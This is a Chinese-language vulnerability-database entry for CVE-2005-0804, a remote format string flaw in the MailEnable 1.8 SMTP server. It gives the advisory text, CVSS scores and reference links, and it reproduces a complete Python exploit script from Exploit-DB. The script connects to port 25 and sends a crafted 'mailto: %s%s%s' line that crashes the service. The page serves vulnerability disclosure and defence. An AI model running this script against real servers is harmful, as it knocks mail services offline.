CVE-2005-0804
CVSS5.0
发布时间 :2005-05-02 00:00:00
修订时间 :2016-10-17 23:14:51
NMCOE    

[原文]Format string vulnerability in MailEnable 1.8 allows remote attackers to cause a denial of service (application crash) via format string specifiers in the mailto field.


[CNNVD]MailEnable远程格式串处理漏洞(CNNVD-200505-730)

        MailEnable是一款邮件服务器程序,可以为Windows NT/2000/XP/2003提供强健的SMTP和POP3服务。
        MailEnable在处理SMTP mailto:请求时存在远程格式串漏洞。如果应用程序处理了通过畸形SMTP请求传送的恶意数据,就可能出现这个漏洞。成功的攻击可能导致服务程序崩溃,或执行任意代码。这可能使攻击者获取非授权访问,或提升权限。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0804
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0804
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-730
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=111108519331738&w=2
(UNKNOWN)  BUGTRAQ  20050317 See-security Advisory: Format string vulnerability in MailEnable 1.8
http://www.securityfocus.com/bid/12833
(UNKNOWN)  BID  12833

- 漏洞信息

MailEnable远程格式串处理漏洞
中危 格式化字符串
2005-05-02 00:00:00 2007-07-24 00:00:00
远程  
        MailEnable是一款邮件服务器程序,可以为Windows NT/2000/XP/2003提供强健的SMTP和POP3服务。
        MailEnable在处理SMTP mailto:请求时存在远程格式串漏洞。如果应用程序处理了通过畸形SMTP请求传送的恶意数据,就可能出现这个漏洞。成功的攻击可能导致服务程序崩溃,或执行任意代码。这可能使攻击者获取非授权访问,或提升权限。
        

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://www.mailenable.com/

- 漏洞信息 (887)

MailEnable 1.8 Remote Format String Denial of Service Exploit (EDBID:887)
windows dos
2005-03-17 Verified
0 Tal Zeltzer
N/A [点击下载]
##################################################################
#                                                                #
#               See-security Technologies ltd.                   #
#                                                                #
#                http://www.see-security.com                     #
#                                                                #
##################################################################
#                                                                #
#          MailEnable 1.8 Format String DoS exploit              #
#                                                                #
#                Discovered by Mati Aharoni                      #
#                                                                #
#                   Coded by tal zeltzer                         #
#                                                                #
##################################################################


import sys
import time
import socket


def PrintLogo():
	print "##################################################################"
	print "#                                                                #"
	print "#               See-security Technologies ltd.                   #"
	print "#                                                                #"
	print "#                http://www.see-security.com                     #"
	print "#                                                                #"
	print "##################################################################"
	print "#"+" "*64+"#"
	print "#          MailEnable 1.8 Format String DoS exploit              #"
	print "#"+" "*64+"#"
	print "#                Discovered by Mati Aharoni                      #"
	print "#                                                                #"
	print "#                   Coded by tal zeltzer                         #"
	print "#"+" "*64+"#"
	print "#"*66+"\n"


PrintLogo()
if (len(sys.argv) != 2):
	print "\n\n"
	print sys.argv[0] + " [Target Host]"
	sys.exit()
sSmtpSocket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
print "[-] Connecting to " + sys.argv[1]
sSmtpSocket.connect((sys.argv[1],25))
print "[-] Connected to " + sys.argv[1]
print "[-] Sending malformed packet"
sSmtpSocket.send("mailto: %s%s%s\r\n")
sSmtpSocket.close()
print "[-] Malformed packet sent"


# milw0rm.com [2005-03-17]
		

- 漏洞信息

14858
MailEnable Standard SMTP mailto: Request Format String
Local / Remote, Context Dependent Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-03-17 Unknow
2005-03-17 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站